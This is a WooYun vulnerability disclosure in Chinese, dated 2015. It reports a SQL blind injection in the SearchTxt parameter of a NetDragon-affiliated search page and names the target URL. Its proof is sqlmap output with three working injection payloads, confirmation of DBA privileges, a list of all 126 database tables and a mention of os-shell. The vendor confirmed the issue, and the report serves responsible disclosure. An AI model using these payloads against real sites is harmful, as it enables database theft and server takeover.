当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2015-0117469

漏洞标题:福建网龙某站SQL盲注影响核心数据DBA权限

相关厂商:福建网龙

漏洞作者: 路人甲

提交时间:2015-06-01 11:41

修复时间:2015-07-16 20:08

公开时间:2015-07-16 20:08

漏洞类型:SQL注射漏洞

危害等级:高

自评Rank:20

漏洞状态:厂商已经确认

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:


漏洞详情

披露状态:

2015-06-01: 细节已通知厂商并且等待厂商处理中
2015-06-01: 厂商已经确认,细节仅向厂商公开
2015-06-11: 细节向核心白帽子及相关领域专家公开
2015-06-21: 细节向普通白帽子公开
2015-07-01: 细节向实习白帽子公开
2015-07-16: 细节向公众公开

简要描述:

233

详细说明:

http://www.ln86e.com/Shequ/Search.aspx?page=1&SearchTxt=1&tag=1 搜索关键字

漏洞证明:

---
Parameter: SearchTxt (GET)
Type: boolean-based blind
Title: OR boolean-based blind - WHERE or HAVING clause
Payload: page=1&SearchTxt=-2599' OR 9566=9566 AND 'Sdri' LIKE 'Sdri&tag=1
Type: stacked queries
Title: MySQL > 5.0.11 stacked queries (SELECT - comment)
Payload: page=1&SearchTxt=1';(SELECT * FROM (SELECT(SLEEP(5)))ZcZJ)#&tag=1
Type: AND/OR time-based blind
Title: MySQL >= 5.0.12 AND time-based blind (SELECT)
Payload: page=1&SearchTxt=1' AND (SELECT * FROM (SELECT(SLEEP(5)))bKfN) AND 'ihhG' LIKE 'ihhG&tag=1
---
web server operating system: Windows 2008 R2 or 7
web application technology: ASP.NET 4.0.30319, ASP.NET, Microsoft IIS 7.5
back-end DBMS: MySQL 5.0.11
current user is DBA: True
Database: ln_zsxx
[126 tables]
+----------------------------+
| user |
| accounts_department |
| accounts_rolepermissions |
| accounts_roles |
| accounts_userroles |
| accounts_users |
| admobile |
| advertisement |
| agednesscommunity |
| agednesscommunityclass |
| b_cataloglist |
| b_cataloglist1115bak |
| b_curlesson |
| b_favorites |
| b_lessionmessage |
| b_lesson |
| b_lesson1115bak |
| b_lesson_jxjy |
| b_lesson_ncjy |
| b_lesson_recm |
| b_lesson_woman |
| b_lessonappraise |
| b_lessoncount |
| b_lessoncount0619bak |
| b_lessongroup |
| b_lessonjoin |
| b_lessonnote |
| b_lessonnote_ding |
| b_lessonnotefavorites |
| b_lessonnoterecommend |
| b_lessonnotereply |
| b_lessontimecount |
| b_lessontimecount_copy |
| b_lessontimecountitem |
| b_lessontimecountitem_copy |
| b_lessontimehistory |
| b_lessontype |
| b_news |
| b_newsclass |
| b_package |
| b_package1115bak |
| b_packagelist |
| b_photo |
| b_recommend |
| b_studytask |
| b_teacherforum |
| b_videolist |
| b_videolist1115bak |
| b_videopackage |
| b_viewvideo |
| b_viewvideo_debug |
| b_viewvideorec |
| blogroll |
| copyright |
| event_category |
| event_data |
| event_photo |
| event_video |
| getpwds |
| mpsysmsg |
| mpsysmsgread |
| new_table_name |
| nonacademic |
| nonacademicdetail |
| onlinecount |
| onlinelist |
| packageidtounitid |
| packageidtounitidbyname |
| rankcity |
| rankles |
| s_dictionary |
| s_tree |
| shequ_advertisement |
| shequ_area |
| shequ_city |
| shequ_data |
| shequ_forum |
| shequ_lesson |
| shequ_news |
| shequ_newsclass |
| shequ_user |
| shequ_user_visit |
| shequ_volunteer |
| site |
| sitetotal |
| starlevel |
| starleveltop |
| system_log |
| t_advertisement |
| t_app_version |
| t_category |
| t_comment |
| t_credit_admin_log |
| t_credit_log |
| t_digglog |
| t_feedback |
| t_hotsearch |
| t_lesson |
| t_lesson_appraise |
| t_lesson_collect |
| t_lesson_command |
| t_menu |
| t_rolemenus |
| t_roles |
| t_slogan |
| t_syslog |
| t_systemlog |
| t_systemuser |
| t_sysuser |
| t_user_creditrule |
| t_user_level |
| t_user_video |
| t_userroles |
| user_count |
| user_follow |
| user_follow_message |
| user_sys_message |
| user_sys_message_status |
| user_tblog |
| user_tblog_comment |
| userstat |
| userstatcount |
| userstatlogincount |
| x_config |
| x_log |
| x_online |
+----------------------------+

os-shell

修复方案:

~

版权声明:转载请注明来源 路人甲@乌云


漏洞回应

厂商回应:

危害等级:高

漏洞Rank:10

确认时间:2015-06-01 20:07

厂商回复:

感谢 路人甲 提供的漏洞,安排修复中

最新状态:

暂无